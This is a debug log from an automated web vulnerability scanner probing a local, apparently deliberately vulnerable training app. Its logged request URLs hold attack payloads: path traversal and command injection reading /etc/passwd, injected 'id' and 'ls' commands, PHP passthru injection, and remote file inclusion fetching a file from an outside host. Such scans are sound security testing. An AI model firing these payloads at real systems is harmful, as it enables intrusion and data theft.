http://localhost:9090/cgi-local/cgiemail-1.6/cgicso?query= returned HTTP code "404" (id=23319,from_cache=0,grep=1,rtt=0.04,did=l6Jr8Rem) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/ncl_items.html returned HTTP code "404" (id=23320,from_cache=0,grep=1,rtt=0.04,did=IqwrXnTF) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/support/messages returned HTTP code "404" (id=23325,from_cache=0,grep=1,rtt=0.12,did=7zw3dCrY) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/20/exec/show returned HTTP code "404" (id=23324,from_cache=0,grep=1,rtt=0.15,did=3OQlXFm9) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/ccbill-local.cgi?cmd=MENU returned HTTP code "404" (id=23321,from_cache=0,grep=1,rtt=0.15,did=pFBVGup3) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=/etc/passwd&reply_message_from=sq@example.com&redirect=http://www.example.com&recipient=sq@example.com returned HTTP code "404" (id=23322,from_cache=0,grep=1,rtt=0.09,did=W9Qk9Kds) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/learn/vulnerability/a5_broken_access_control returned HTTP code "200" (id=23323,from_cache=0,grep=1,rtt=0.02,did=ep7jMrb7) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/logs/str_err.log returned HTTP code "404" (id=23316,from_cache=0,grep=1,rtt=0.09,did=4ZpWSxMn) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4489. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2181. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/68/exec/show returned HTTP code "404" (id=23327,from_cache=0,grep=1,rtt=0.15,did=xctKdbGj) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgis/wwwboard/wwwboard.cgi returned HTTP code "404" (id=23328,from_cache=0,grep=1,rtt=0.13,did=JBmN8Grb) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/learn/vulnerability/a5_broken_access_control returned HTTP code "200" (id=23329,from_cache=0,grep=1,rtt=0.12,did=G0cKMA8C) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/forum/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23330,from_cache=0,grep=1,rtt=0.01,did=c9iPRX8H) [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:143 / in_use:3 / max:50 / total:146) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (3bd0f6551a504a60, 0.07 sec) (743d5ece127c4046, 0.04 sec) (758f784eff08af35, 0.03 sec) [Wed Feb 12 10:04:29 2020 - debug] POST http://localhost:9090/_vti_bin/shtml.dll/_vti_rpc?method=server version:4.0.2.2611 returned HTTP code "404" (id=23332,from_cache=0,grep=1,rtt=0.11,did=J3u7mOMq) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/59/exec/show returned HTTP code "404" (id=23333,from_cache=0,grep=1,rtt=0.07,did=XlOLVTNe) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/shopadmin.asp returned HTTP code "404" (id=23337,from_cache=0,grep=1,rtt=0.18,did=O2INNkOV) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 returned HTTP code "302" (id=23331,from_cache=0,grep=1,rtt=0.04,did=geIeZUCk) [Wed Feb 12 10:04:29 2020 - debug] htaccess_methods.audit(did="aPIhTTKL",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.61s to run [Wed Feb 12 10:04:29 2020 - debug] mx_injection.audit(did="Zog3jme4", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Zog3jme4) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/39/exec/show returned HTTP code "404" (id=23334,from_cache=0,grep=1,rtt=0.13,did=ox1wvY3e) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/examples/jsp/snp/snoop.jsp returned HTTP code "404" (id=23326,from_cache=0,grep=1,rtt=0.13,did=gbxZGfc1) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/16/exec/show/access-lists returned HTTP code "404" (id=23335,from_cache=0,grep=1,rtt=0.15,did=0C91hvAg) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2182. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/common/listrec.pl returned HTTP code "404" (id=23338,from_cache=0,grep=1,rtt=0.01,did=pwLpFB1m) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/interscan/cgi-bin/FtpSave.dll?I\'m Here= returned HTTP code "404" (id=23339,from_cache=0,grep=1,rtt=0.08,did=HJYno5tN) [Wed Feb 12 10:04:29 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4489. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2183. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4489. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4490. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/postinfo.html returned HTTP code "404" (id=23341,from_cache=0,grep=1,rtt=0.04,did=BxC0lOil) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/php.ini returned HTTP code "404" (id=23340,from_cache=0,grep=1,rtt=0.13,did=s3R6Hqee) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4491. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/title.cgi returned HTTP code "404" (id=23336,from_cache=0,grep=1,rtt=0.16,did=CeAknKm8) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/pagelog.cgi returned HTTP code "404" (id=23343,from_cache=0,grep=1,rtt=0.04,did=iQTxxAdM) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/modules/index.php?name=Forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23347,from_cache=0,grep=1,rtt=0.02,did=kUFzC4wV) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=;id returned HTTP code "404" (id=23348,from_cache=0,grep=1,rtt=0.14,did=UL1FmFwZ) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/postnuke/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23349,from_cache=0,grep=1,rtt=0.15,did=xEtOWI2s) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4492. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/50/exec/show returned HTTP code "404" (id=23345,from_cache=0,grep=1,rtt=0.07,did=0k9gEaxY) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~ftp returned HTTP code "404" (id=23350,from_cache=0,grep=1,rtt=0.15,did=uK5wJF75) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/30/exec/show returned HTTP code "404" (id=23351,from_cache=0,grep=1,rtt=0.06,did=qtxoQWnl) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/nimages.php returned HTTP code "404" (id=23346,from_cache=0,grep=1,rtt=0.10,did=PgqFiHlv) [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:144 / in_use:5 / max:50 / total:149) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (74290a68deaae420, 0.14 sec) (fd9bba9215c75e68, 0.11 sec) (ae5a0847d78d5711, 0.09 sec) (0234fcc660fc843a, 0.07 sec) (e31e22640a03936b, 0.03 sec) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/78/exec/show returned HTTP code "404" (id=23344,from_cache=0,grep=1,rtt=0.01,did=iHf82to3) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd= returned HTTP code "404" (id=23353,from_cache=0,grep=1,rtt=0.09,did=8WMJUElM) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/mailman/admin/ml-name?\\">= returned HTTP code "404" (id=23355,from_cache=0,grep=1,rtt=0.11,did=7Y2Tz8C1) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23357,from_cache=0,grep=1,rtt=0.12,did=dBgXydBa) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/98/exec/show returned HTTP code "404" (id=23358,from_cache=0,grep=1,rtt=0.12,did=FrYX1PHy) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4493. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4494. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cfdocs/snippets/gettempdirectory.cfm returned HTTP code "404" (id=23342,from_cache=0,grep=1,rtt=0.04,did=zXVuenWU) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/netutils/whodata.stm?sitename= returned HTTP code "404" (id=23359,from_cache=0,grep=1,rtt=0.12,did=oqtnaUMk) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/88/exec/show returned HTTP code "404" (id=23360,from_cache=0,grep=1,rtt=0.10,did=5kxYwb0S) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/orders/order_log.dat returned HTTP code "404" (id=23362,from_cache=0,grep=1,rtt=0.05,did=MOlLp94x) [Wed Feb 12 10:04:29 2020 - debug] symfony.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_generator.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] retirejs.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/where.pl?sd=ls /etc returned HTTP code "404" (id=23356,from_cache=0,grep=1,rtt=0.10,did=e0SEdriX) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/21/exec/show returned HTTP code "404" (id=23352,from_cache=0,grep=1,rtt=0.12,did=F5Gwot8L) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/upload.cgi returned HTTP code "404" (id=23354,from_cache=0,grep=1,rtt=0.10,did=4V40yxPG) [Wed Feb 12 10:04:29 2020 - debug] motw.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4495. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4496. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/ncl_items.shtml?SUBJECT=1 returned HTTP code "404" (id=23361,from_cache=0,grep=1,rtt=0.06,did=KxISsJ2I) [Wed Feb 12 10:04:29 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] file_upload.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] svn_users.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] expect_ct.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] private_ip.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4497. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/learn/vulnerability/a5_broken_access_control returned HTTP code "200" (id=23363,from_cache=0,grep=1,rtt=0.10,did=ep7jMrb7) [Wed Feb 12 10:04:29 2020 - debug] cors_origin.audit(did="ep7jMrb7",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 1.11s to run (0.12s 10% sending HTTP requests) [Wed Feb 12 10:04:29 2020 - debug] response_splitting.audit(did="DH3AQtkJ", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:DH3AQtkJ) [Wed Feb 12 10:04:29 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:29 2020 - debug] serialized_object.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] blank_body.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] credit_cards.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] websockets_links.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] csp.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dom_xss.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] keys.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] clamav.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] objects.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] error_500.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_tags.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] password_profiling.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] click_jacking.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] lang.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4498. [Wed Feb 12 10:04:29 2020 - debug] error_pages.grep(uri="http://localhost:9090/21/") took 0.04s to run [Wed Feb 12 10:04:29 2020 - debug] strange_reason.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cache_control.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_headers.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] ssn.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] oracle.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] feeds.grep(uri="http://localhost:9090/21/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] vulners_db.grep(uri="http://localhost:9090/21/") took 0.05s to run [Wed Feb 12 10:04:29 2020 - debug] url_session.grep(uri="http://localhost:9090/21/") took 0.05s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/60/exec/show returned HTTP code "404" (id=23365,from_cache=0,grep=1,rtt=0.16,did=A0arxV2K) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/mastergate/search.cgi?search=0&search_on=all returned HTTP code "404" (id=23367,from_cache=0,grep=1,rtt=0.12,did=OHwObZiQ) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4499. [Wed Feb 12 10:04:29 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/21/") took 0.05s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/40/exec/show returned HTTP code "404" (id=23369,from_cache=0,grep=1,rtt=0.05,did=GjP6YVHI) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/handler returned HTTP code "404" (id=23370,from_cache=0,grep=1,rtt=0.08,did=MofIemhh) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/16/level/16/exec/show/configuration returned HTTP code "404" (id=23371,from_cache=0,grep=1,rtt=0.06,did=doW0s9qR) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/modsecurity.php?inc_prefix=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23372,from_cache=0,grep=1,rtt=0.17,did=OpyvrqGt) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgis/wwwboard/wwwboard.pl returned HTTP code "404" (id=23373,from_cache=0,grep=1,rtt=0.17,did=nUQz0zLb) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 returned HTTP code "302" (id=23374,from_cache=0,grep=1,rtt=0.03,did=YtAoLyh4) [Wed Feb 12 10:04:29 2020 - debug] POST http://localhost:9090/cgi-bin/lastlines.cgi?process= returned HTTP code "404" (id=23376,from_cache=0,grep=1,rtt=0.15,did=JJibJUcg) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/fcgi-bin/echo2.exe?foo= returned HTTP code "404" (id=23375,from_cache=0,grep=1,rtt=0.15,did=kzYiDStV) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/compatible.cgi returned HTTP code "404" (id=23377,from_cache=0,grep=1,rtt=0.14,did=Tdu7vzyS) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/mall_log_files/order.log returned HTTP code "404" (id=23378,from_cache=0,grep=1,rtt=0.12,did=QLLJFckI) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/69/exec/show returned HTTP code "404" (id=23368,from_cache=0,grep=1,rtt=0.03,did=7x3Eg28g) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/_vti_pvt/bots.cnf returned HTTP code "404" (id=23364,from_cache=0,grep=1,rtt=0.02,did=jfDp1eHK) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4500. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/csChatRBox.cgi?command=savesetup&setup=&system(\'cat /etc/passwd\')= returned HTTP code "404" (id=23366,from_cache=0,grep=1,rtt=0.15,did=r5L0NZ0K) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/anthill/login.php returned HTTP code "404" (id=23379,from_cache=0,grep=1,rtt=0.07,did=E7KqNooy) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/spin_client.cgi?aaaaaaaa= returned HTTP code "404" (id=23380,from_cache=0,grep=1,rtt=0.11,did=cIqhei4T) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4500. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4500. [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:142 / in_use:17 / max:50 / total:159) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (ae5a0847d78d5711, 0.20 sec) (3bd0f6551a504a60, 0.20 sec) (eba60f9115efb316, 0.19 sec) (c26e7cc18109a4d2, 0.18 sec) (e0c540706cea7b02, 0.17 sec) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/na_admin/ataglance.html returned HTTP code "404" (id=23381,from_cache=0,grep=1,rtt=0.03,did=cJxn7RLb) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/phpBB/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23382,from_cache=0,grep=1,rtt=0.19,did=rs9dH6AV) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&Rank= returned HTTP code "404" (id=23383,from_cache=0,grep=1,rtt=0.15,did=tKvwfrVz) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23386,from_cache=0,grep=1,rtt=0.08,did=RJd9OoAn) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=;id returned HTTP code "404" (id=23387,from_cache=0,grep=1,rtt=0.32,did=gd8J4QTF) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4501. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/robadmin.cgi returned HTTP code "404" (id=23390,from_cache=0,grep=1,rtt=0.11,did=U9favwzD) [Wed Feb 12 10:04:29 2020 - debug] file_upload.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] expect_ct.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] svn_users.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] private_ip.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] motw.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_generator.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] retirejs.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/51/exec/show returned HTTP code "404" (id=23385,from_cache=0,grep=1,rtt=0.11,did=XBGkbwGn) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/nsn/env.bas returned HTTP code "404" (id=23391,from_cache=0,grep=1,rtt=0.20,did=I9JLwtEw) [Wed Feb 12 10:04:29 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/79/exec/show returned HTTP code "404" (id=23389,from_cache=0,grep=1,rtt=0.18,did=VugrneRy) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/31/exec/show returned HTTP code "404" (id=23384,from_cache=0,grep=1,rtt=0.03,did=anaWC83c) [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:142 / in_use:9 / max:50 / total:151) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (ae5a0847d78d5711, 0.19 sec) (e31e22640a03936b, 0.11 sec) (3793e2e0b91cd988, 0.10 sec) (520e7ffb468c62bc, 0.05 sec) (e358dc2cd4e3a434, 0.04 sec) [Wed Feb 12 10:04:29 2020 - debug] symfony.grep(uri="http://localhost:9090/14/") took 0.08s to run [Wed Feb 12 10:04:29 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/phpBB/viewtopic.php?topic_id= returned HTTP code "404" (id=23388,from_cache=0,grep=1,rtt=0.13,did=pnXtJNBN) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/.aspx returned HTTP code "404" (id=23394,from_cache=0,grep=1,rtt=0.16,did=v1wp9tpF) [Wed Feb 12 10:04:29 2020 - debug] serialized_object.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] blank_body.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] credit_cards.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] websockets_links.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] csp.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dom_xss.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/Orders/order_log.dat returned HTTP code "404" (id=23395,from_cache=0,grep=1,rtt=0.23,did=0rRhjQ4h) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2184. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator returned HTTP code "404" (id=23405,from_cache=0,grep=1,rtt=0.06,did=c3mnL60X) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" 